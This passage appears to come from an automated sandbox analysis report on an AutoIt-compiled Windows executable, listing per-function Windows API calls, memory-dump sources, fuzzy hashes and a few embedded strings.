                                                    • Instruction Fuzzy Hash: 06518A31208200AFDB11EF24C885E6FBBE8FF89304F04492EF5468B2A1DB35E955CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: 50c8cb853cf14b051fda6a783bf37629f0893285d6b31126b4622e181f8fdb0a
                                                    • Instruction ID: 706d93e35863bb469c5432b57814e51fe030480c93876b65c3eef3a080d07faf
                                                    • Opcode Fuzzy Hash: 50c8cb853cf14b051fda6a783bf37629f0893285d6b31126b4622e181f8fdb0a
                                                    • Instruction Fuzzy Hash: 82519135A00625EFDF11EFA5C845AAEB7B4EF48310F11446AE815BB352CB74BE41CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 003C179A
                                                    • GetWindowRect.USER32 ref: 003C17FE
                                                    • ScreenToClient.USER32 ref: 003C181B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003C182C
                                                    • EndPaint.USER32(?,?), ref: 003C1876
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: 0e45eb877d220ac8cd0278108bb3357506286849dbcd400920bbdcc583275602
                                                    • Instruction ID: aabd4e868e540c4e03b149722229cec9d5bb72e63300ff8b6bbd941b88ea7755
                                                    • Opcode Fuzzy Hash: 0e45eb877d220ac8cd0278108bb3357506286849dbcd400920bbdcc583275602
                                                    • Instruction Fuzzy Hash: 27419D71104304AFD712EF64CC84FBA7BE8EB46324F150A2DF594CA1A2C7319C45EB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ShowWindow.USER32(004867B0,00000000,00F784A8,?,?,004867B0,?,0044B862,?,?), ref: 0044B9CC
                                                    • EnableWindow.USER32(?,00000000), ref: 0044B9F0
                                                    • ShowWindow.USER32(004867B0,00000000,00F784A8,?,?,004867B0,?,0044B862,?,?), ref: 0044BA50
                                                    • ShowWindow.USER32(?,00000004,?,0044B862,?,?), ref: 0044BA62
                                                    • EnableWindow.USER32(?,00000001), ref: 0044BA86
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0044BAA9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 12f191154257173d152095132ea99b2660e4365b9dbbaa2f1d8fbf681d2349e6
                                                    • Instruction ID: 4a199fdd312ffe68975fbbb2a8b8bbda4ded8520d7aac6792a54363693bfb497
                                                    • Opcode Fuzzy Hash: 12f191154257173d152095132ea99b2660e4365b9dbbaa2f1d8fbf681d2349e6
                                                    • Instruction Fuzzy Hash: AD418574600540AFEB21CF14D489B967BE0FF06315F1841BAFA489F7A2C735E849CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0042737F
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004273B6
                                                    • EnterCriticalSection.KERNEL32(?), ref: 004273D2
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0042744C
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00427461
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00427480
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                    • String ID:
                                                    • API String ID: 3368777196-0
                                                    • Opcode ID: 6775262fc5613a54faecf734c3272caaf0f5f5ec9c3d3eecf65014680c4c7415
                                                    • Instruction ID: 5eae802a59c52f886725ac41147df7906035ef74b1d8800cb6e6afbc964f986a
                                                    • Opcode Fuzzy Hash: 6775262fc5613a54faecf734c3272caaf0f5f5ec9c3d3eecf65014680c4c7415
                                                    • Instruction Fuzzy Hash: 3031FE36904115EBDF10EFA5EC85DAFBBB8FF41310B1041B6F904AA286CB719E54CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00435134,?,?,00000000,00000001), ref: 004373BF
                                                      • Part of subcall function 00433C94: GetWindowRect.USER32 ref: 00433CA7
                                                    • GetDesktopWindow.USER32 ref: 004373E9
                                                    • GetWindowRect.USER32 ref: 004373F0
                                                    • mouse_event.USER32 ref: 00437422
                                                      • Part of subcall function 004254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042555E
                                                    • GetCursorPos.USER32(?,?,?,?,?,?,00435134,?,?,00000000,00000001), ref: 0043744E
                                                    • mouse_event.USER32 ref: 004374AC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: 23a72e13357cc633a4fb2cbea6a907051ca6ce91108e7123ca3aadc4681eb2be
                                                    • Instruction ID: f2573878911e106df070647cf0764d2afcb413aa0fc2b450b6a8a2c98699829a
                                                    • Opcode Fuzzy Hash: 23a72e13357cc633a4fb2cbea6a907051ca6ce91108e7123ca3aadc4681eb2be
                                                    • Instruction Fuzzy Hash: 3E31E472108305AFD720DF54DC49FABBBA9FB99358F00092AF58897191C735E909CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 004185F1: GetTokenInformation.ADVAPI32(00000000,00000002,00000000,00000000,?,00000000,00000000,00000000,?,00418D7D,00000000,?,?,00000000,00000000), ref: 00418608
                                                      • Part of subcall function 004185F1: GetLastError.KERNEL32(?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977,?,?), ref: 00418612
                                                      • Part of subcall function 004185F1: GetProcessHeap.KERNEL32(00000008,?,?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977,?,?), ref: 00418621
                                                      • Part of subcall function 004185F1: HeapAlloc.KERNEL32(00000000,?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977,?,?), ref: 00418628
                                                      • Part of subcall function 004185F1: GetTokenInformation.ADVAPI32(00000000,00000002,00000000,?,?,?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977), ref: 0041863E
                                                    • GetLengthSid.ADVAPI32(?,00000000,00418977,?,?), ref: 00418DAC
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00418DB8
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00418DBF
                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00418DD8
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00418977,?,?), ref: 00418DEC
                                                    • HeapFree.KERNEL32(00000000), ref: 00418DF3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                    • String ID:
                                                    • API String ID: 3008561057-0
                                                    • Opcode ID: d6f5e030660d210e2dcbd672ae6c09d2291a29329ea4a604732d6c5b3ada07cb
                                                    • Instruction ID: d546d98bd28ea9bdafedb96811bb42b730ca6a903b3926641b8b93694214777e
                                                    • Opcode Fuzzy Hash: d6f5e030660d210e2dcbd672ae6c09d2291a29329ea4a604732d6c5b3ada07cb
                                                    • Instruction Fuzzy Hash: DF11AF76601604FFDB108FA4EC49BFF7BA9EB52355F10402EF44597250CB3A9984CB28
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004,?,?,00000000,?,?,0043FCD2,?,?,?,?,?,?,?,?), ref: 00418B2A
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,0043FCD2,?,?,?,?,?,?,?,?,?,?,?), ref: 00418B31
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001,?,?,0043FCD2,?,?,?,?,?,?,?,?,?,?), ref: 00418B40
                                                    • CloseHandle.KERNEL32(00000004,?,?,0043FCD2,?,?,?,?,?,?,?,?,?,?,?), ref: 00418B4B
                                                    • CreateProcessWithLogonW.ADVAPI32(00000001,00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00418B7A
                                                    • DestroyEnvironmentBlock.USERENV(00000000,?,?,0043FCD2,?,?,?,?,?,?,?,?,?,?,?), ref: 00418B8E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 54e8d45d625151f4ae7e037361a45dbdbbce73edd6cb446bce560910fdd862e7
                                                    • Instruction ID: 5e7f0b7a4d1f9995791bd828f0eb5f03a976541550255b5e181dd38e36ba06b5
                                                    • Opcode Fuzzy Hash: 54e8d45d625151f4ae7e037361a45dbdbbce73edd6cb446bce560910fdd862e7
                                                    • Instruction Fuzzy Hash: 2F116AB6105109ABDB018F94EC49FEA7BADEB06304F044026FA00A1060C77A9D649B64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0041BC78
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0041BC89
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041BC90
                                                    • ReleaseDC.USER32 ref: 0041BC98
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0041BCAF
                                                    • MulDiv.KERNEL32(000009EC,?,00000008), ref: 0041BCC1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 1c68ace6c27fe22c0c1c24a4264366f85ed3c90c8cf5a59530c7912de1d81c4f
                                                    • Instruction ID: c162c83f7d6a1f2a1353980164e7ba76f7fc8c984ba79f1aee02db59ff8975d5
                                                    • Opcode Fuzzy Hash: 1c68ace6c27fe22c0c1c24a4264366f85ed3c90c8cf5a59530c7912de1d81c4f
                                                    • Instruction Fuzzy Hash: 770184B6A00208BFEB109BE19D49EAF7F7CEB453A5F00407BFA04A6290D6315C05CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003C134D
                                                      • Part of subcall function 003C12F3: SelectObject.GDI32(?,00000000), ref: 003C135C
                                                      • Part of subcall function 003C12F3: BeginPath.GDI32(?), ref: 003C1373
                                                      • Part of subcall function 003C12F3: SelectObject.GDI32(?,00000000), ref: 003C139C
                                                    • MoveToEx.GDI32(00000000,?,00000000,00000000), ref: 0044C1C4
                                                    • LineTo.GDI32(00000000,?,00000000), ref: 0044C1D8
                                                    • MoveToEx.GDI32(00000000,?,-00000002,00000000), ref: 0044C1E6
                                                    • LineTo.GDI32(00000000,?,00000003), ref: 0044C1F6
                                                    • EndPath.GDI32(00000000), ref: 0044C206
                                                    • StrokePath.GDI32(00000000), ref: 0044C216
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                    • String ID:
                                                    • API String ID: 43455801-0
                                                    • Opcode ID: d60981dcb2eefd3c8bf2f4c25212962d13f9f6115f39efc76d1c7de246045892
                                                    • Instruction ID: 932e77fbd543e65b742a28c8df0d6d76c9061e5508293436205e6958b55f0cec
                                                    • Opcode Fuzzy Hash: d60981dcb2eefd3c8bf2f4c25212962d13f9f6115f39efc76d1c7de246045892
                                                    • Instruction Fuzzy Hash: 26110C7640015CBFEB119F90DC88FAA3F6DEB05394F048465F91849161C7729D59DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B), ref: 003E03D3
                                                    • MapVirtualKeyW.USER32(00000010), ref: 003E03DB
                                                    • MapVirtualKeyW.USER32(000000A0), ref: 003E03E6
                                                    • MapVirtualKeyW.USER32(000000A1), ref: 003E03F1
                                                    • MapVirtualKeyW.USER32(00000011), ref: 003E03F9
                                                    • MapVirtualKeyW.USER32(00000012), ref: 003E0401
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: e4c61cfb401498723b53d5b492cf135cf1fac9c44382f076fef6dc4b2f00a5da
                                                    • Instruction ID: b84b34de5dce582fec9b36a26545d5f9940df62a2eddc3babc0398671d0c62ad
                                                    • Opcode Fuzzy Hash: e4c61cfb401498723b53d5b492cf135cf1fac9c44382f076fef6dc4b2f00a5da
                                                    • Instruction Fuzzy Hash: C1016CB0906B5A7DE3008F6A8C85B57FFA8FF45354F00421BE15C47941C3B5A868CBE9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • PostMessageW.USER32(?,00000010), ref: 0042569B
                                                    • SendMessageTimeoutW.USER32 ref: 004256B1
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 004256C0
                                                    • OpenProcess.KERNEL32(001F0FFF,?,?,?,?,?,00000010,?,?,00000002,000001F4,?,?,00000010), ref: 004256CF
                                                    • TerminateProcess.KERNEL32(00000000,?,?,?,?,?,?,00000010,?,?,00000002,000001F4,?,?,00000010), ref: 004256D9
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000010,?,?,00000002,000001F4,?,?,00000010), ref: 004256E0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: 5c52fc533b3cc3a383353e7e86e6eb3f68042e491160e04e46f773155687815f
                                                    • Instruction ID: 173fdd6a141582da09f0871ea5d203ff57c35435fbfdb26dcc8f29259ab7230e
                                                    • Opcode Fuzzy Hash: 5c52fc533b3cc3a383353e7e86e6eb3f68042e491160e04e46f773155687815f
                                                    • Instruction Fuzzy Hash: 73F01D36241558BBE6215BA6EC0DEEF7F7CEFC7B11F000179F604910519AA11A05C6B9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 004274E5
                                                    • EnterCriticalSection.KERNEL32(?,?,003D1044,?,?), ref: 004274F6
                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,003D1044,?,?), ref: 00427503
                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,003D1044,?,?), ref: 00427510
                                                      • Part of subcall function 00426ED7: CloseHandle.KERNEL32(00000000,?,0042751D,?,003D1044,?,?), ref: 00426EE1
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00427523
                                                    • LeaveCriticalSection.KERNEL32(?,?,003D1044,?,?), ref: 0042752A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 44518cf3fb42757a570bc8940a9569219eaeccae4775a4b1803feab63286fca4
                                                    • Instruction ID: fb1515a91b93dfa17f19e2f7c542edbc6202dcb761f8c163267767e9011a4974
                                                    • Opcode Fuzzy Hash: 44518cf3fb42757a570bc8940a9569219eaeccae4775a4b1803feab63286fca4
                                                    • Instruction Fuzzy Hash: 41F0897E144B12EBE7111B64FC4C9DB7B79FF46312B400572F102904B0CB765445CB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00418E7F
                                                    • UnloadUserProfile.USERENV(?,?), ref: 00418E8B
                                                    • CloseHandle.KERNEL32(?), ref: 00418E94
                                                    • CloseHandle.KERNEL32(?), ref: 00418E9C
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00418EA5
                                                    • HeapFree.KERNEL32(00000000), ref: 00418EAC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: 180f1d3d97952489b2a460c2afcb65e722a0986b32613118e38ea533ae461374
                                                    • Instruction ID: 31a27faa56cc57cec5e58d63ca4e9026a37862f61046b8bcedf47ae97ad442b4
                                                    • Opcode Fuzzy Hash: 180f1d3d97952489b2a460c2afcb65e722a0986b32613118e38ea533ae461374
                                                    • Instruction Fuzzy Hash: 97E0757A104505FBDB011FE5EC0C95ABFB9FF8A762B508631F619C1470CB32A869DB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00417652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 0041766F
                                                      • Part of subcall function 00417652: ProgIDFromCLSID.OLE32(00000000,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 0041768A
                                                      • Part of subcall function 00417652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 00417698
                                                      • Part of subcall function 00417652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 004176A8
                                                    • CoInitializeSecurity.OLE32(?,000000FF,?,?,00000002,00000003,?,?,?,?,?,?), ref: 00439B1B
                                                    • CoCreateInstanceEx.OLE32(?,?,00000015,?,00000001,?), ref: 00439C97
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 00439CF0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FromProg$CreateFreeInitializeInstanceSecurityTasklstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 375401485-2785691316
                                                    • Opcode ID: c7d768e8f40827318aa438b6827ec7c59f4daea659b26fdb8c2f1cfd5f194393
                                                    • Instruction ID: 18e652e9e619a051782ae2460e9de98f0e97404e86d2aa719d4f1f0361b4eb38
                                                    • Opcode Fuzzy Hash: c7d768e8f40827318aa438b6827ec7c59f4daea659b26fdb8c2f1cfd5f194393
                                                    • Instruction Fuzzy Hash: 02914871D00228ABDB11DFA5DC85EDEBBB8EF08310F20415AF519AB281DB756E45CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00438928
                                                    • CharUpperBuffW.USER32(?,?), ref: 00438A37
                                                    • VariantClear.OLEAUT32(?), ref: 00438BAF
                                                      • Part of subcall function 00427804: VariantInit.OLEAUT32(00000000), ref: 00427844
                                                      • Part of subcall function 00427804: VariantCopy.OLEAUT32(?,00000000), ref: 0042784D
                                                      • Part of subcall function 00427804: VariantClear.OLEAUT32(?), ref: 00427859
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: 251b1036227e99c6659ac613002176fa9932da11ee5f04a4265f23625b158759
                                                    • Instruction ID: e6026a6c5a059052d827b30ebfaf2aa9e08bb9b7b7112b1a7c4ee058a7cbe007
                                                    • Opcode Fuzzy Hash: 251b1036227e99c6659ac613002176fa9932da11ee5f04a4265f23625b158759
                                                    • Instruction Fuzzy Hash: AB917A756083029FC700DF25C484A5BFBE4AF89714F14896EF89A8B362DB34ED46CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0043DAD9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: BuffCharLower
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 2358735015-567219261
                                                    • Opcode ID: 27cb18a46760707ad1f7a1565939fa2f48770fd59a3c3ed68a88d186b97a8508
                                                    • Instruction ID: 0369a79a2ba35b26f6159f3893ad91a1253ae6ca5f2d8e7a1710ffdd763f43af
                                                    • Opcode Fuzzy Hash: 27cb18a46760707ad1f7a1565939fa2f48770fd59a3c3ed68a88d186b97a8508
                                                    • Instruction Fuzzy Hash: 02318071900219AFCB11EFA4DC81DEBB3B4FF05360B108A2AE465AB6D1CB75B905CB94
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0041B0C4: GetClassNameW.USER32 ref: 0041B0E7
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004193F6
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00419409
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00419439
                                                    Memory Dump Source
